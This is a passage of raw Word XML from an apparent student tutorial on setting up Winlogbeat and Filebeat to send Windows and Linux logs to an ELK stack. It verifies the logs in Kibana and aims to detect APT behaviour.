          <v:rect id="_x0000_i1060" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F17F09E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🧾</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 6: Verify in Kibana</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6476AF38" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">Go to </w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Kibana → Discover</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:br/>
        <w:t>Select index pattern:</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:br/>
        <w:t>If you followed previous setup, you’ll see something like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="382CDEAC" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>filebeat-8.15.0-*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C673278" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>You should see live logs streaming in.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E07F219" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>If not:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61DF6E04" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">Check Logstash pipeline (docker compose logs </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>logstash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> --tail 200)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538C6D7D" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">Check </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>Filebeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> logs:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D512CAD" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="45"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="clear" w:pos="720"/>
        </w:tabs>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> tail -f /var/log/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>filebeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>filebeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3E2BC1A3" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00000000" w:rsidP="00645538">
      <w:r>
        <w:pict w14:anchorId="1BB84148">
          <v:rect id="_x0000_i1061" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB06D6C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🪟</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 3.3 Install and Configure </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Winlogbeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (Windows)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E628E98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📥</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 1: Download</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46052633" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:lastRenderedPageBreak/>
        <w:t>Official download:</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:br/>
      </w:r>
      <w:hyperlink r:id="rId36" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00645538">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.elastic.co/downloads/beats/winlogbeat</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4E974938" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>Download .zip → extract to C:\Program Files\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>Winlogbeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1CE0C941" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00000000" w:rsidP="00645538">
      <w:r>
        <w:pict w14:anchorId="06AD2CD8">
          <v:rect id="_x0000_i1062" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="76958945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⚙️</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 2: Configure Output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C000EB" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>Edit C:\Program Files\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>Winlogbeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>winlogbeat.yml</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1DF02418" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>Disable Elasticsearch output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20A575B3" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>output.elasticsearch</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A12AB9" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>#   hosts: ["localhost:9200"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF0B4C0" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>Enable Logstash output:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="005316C6" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>output.logstash</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E9D6880" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">  hosts: ["&lt;ELK_VM_IP&gt;:5044"]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BE9D50" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00000000" w:rsidP="00645538">
      <w:r>
        <w:pict w14:anchorId="3C9E0B19">
          <v:rect id="_x0000_i1063" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A5F1B6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🧩</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 3: Configure which Windows Logs to Collect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5736DBDC" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>In the same file:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9D73CA" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>winlogbeat.event_logs</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="297009AA" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">  - name: Application</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A2F8D35" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">  - name: Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D490AEA" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">  - name: System</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163472A0" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">  - name: Microsoft-Windows-PowerShell/Operational</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751E1FC4" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">These include login attempts, PowerShell executions, etc. — crucial for detecting APT </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>behaviors</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FB59286" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00000000" w:rsidP="00645538">
      <w:r>
        <w:pict w14:anchorId="161C9381">
          <v:rect id="_x0000_i1064" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C2DCF3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▶️</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 4: Run and Test</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A30795" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>Open PowerShell (Admin):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A66A689" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>cd "C:\Program Files\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>Winlogbeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0FB394" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>.\winlogbeat.exe test config</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78691E7C" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>.\winlogbeat.exe test output</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C3868F" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>.\install-service-winlogbeat.ps1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F0E248B" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">Start-Service </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>winlogbeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4C9CC76E" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00000000" w:rsidP="00645538">
      <w:r>
        <w:pict w14:anchorId="61537209">
          <v:rect id="_x0000_i1065" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="359BA61F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🧾</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Step 5: Verify in Kibana</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F40C0F7" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:lastRenderedPageBreak/>
        <w:t>Open Kibana → Discover →</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:br/>
        <w:t>Check if you see indices like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62378511" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>winlogbeat-8.15.0-*</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F8C601" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">If yes → success </w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>🎉</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D0CC43" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">You’re now receiving </w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Windows Event Logs</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> (login attempts, PowerShell usage, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3538ED26" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00000000" w:rsidP="00645538">
      <w:r>
        <w:pict w14:anchorId="594AA99F">
          <v:rect id="_x0000_i1066" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="63EE973B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🌐</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 3.4 (Optional Advanced) </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Packetbeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Auditbeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="532C96C3" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>Later, you can enhance your project by adding:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70A098FE" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Packetbeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> → captures network traffic (detect lateral movement, C2 connections)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1A4687" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="46"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Auditbeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> → monitors Linux kernel events (e.g., file access, privilege escalation)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7710856D" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">Installation is similar to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>Filebeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:br/>
      </w:r>
      <w:hyperlink r:id="rId37" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00645538">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.elastic.co/guide/en/beats/packetbeat/current/packetbeat-installation.html</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00645538">
        <w:br/>
      </w:r>
      <w:hyperlink r:id="rId38" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00645538">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.elastic.co/guide/en/beats/auditbeat/current/auditbeat-installation.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="4FDBA560" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00000000" w:rsidP="00645538">
      <w:r>
        <w:pict w14:anchorId="205A1740">
          <v:rect id="_x0000_i1067" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="38643A9A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🔒</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 3.5 Secure Beat Communication (Optional for later)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="782900E8" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">If your beats send logs over public networks → use </w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>TLS encryption</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:br/>
      </w:r>
      <w:hyperlink r:id="rId39" w:tgtFrame="_new" w:history="1">
        <w:r w:rsidRPr="00645538">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://www.elastic.co/guide/en/beats/filebeat/current/configuring-ssl-logstash.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="5814B1C0" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t>For SIH demo (local network), plain TCP is fine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF3FB20" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00000000" w:rsidP="00645538">
      <w:r>
        <w:pict w14:anchorId="3B3AA799">
          <v:rect id="_x0000_i1068" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="26F5D571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🧠</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 3.6 Recap — What You’ve Achieved</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="400A0939" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> Installed </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>Filebeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> on Linux machines</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> Installed </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>Winlogbeat</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> on Windows machines</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> Configured them to send logs to Logstash</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> Verified logs appear in Kibana Discover</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> Enabled multiple modules (system, ssh, PowerShell)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C1099E2" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00645538" w:rsidP="00645538">
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">At this point — your ELK setup is </w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>collecting real-world data</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve">, which you’ll </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:t>analyze</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t xml:space="preserve"> to detect </w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">APT </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00645538">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>behavior</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00645538">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03EC6C90" w14:textId="77777777" w:rsidR="00645538" w:rsidRPr="00645538" w:rsidRDefault="00000000" w:rsidP="00645538">
      <w:r>
        <w:pict w14:anchorId="543C7F02">
          <v:rect id="_x0000_i1069" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="200D94A6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📘</w:t>
      </w:r>
      <w:r w:rsidRPr="00645538">
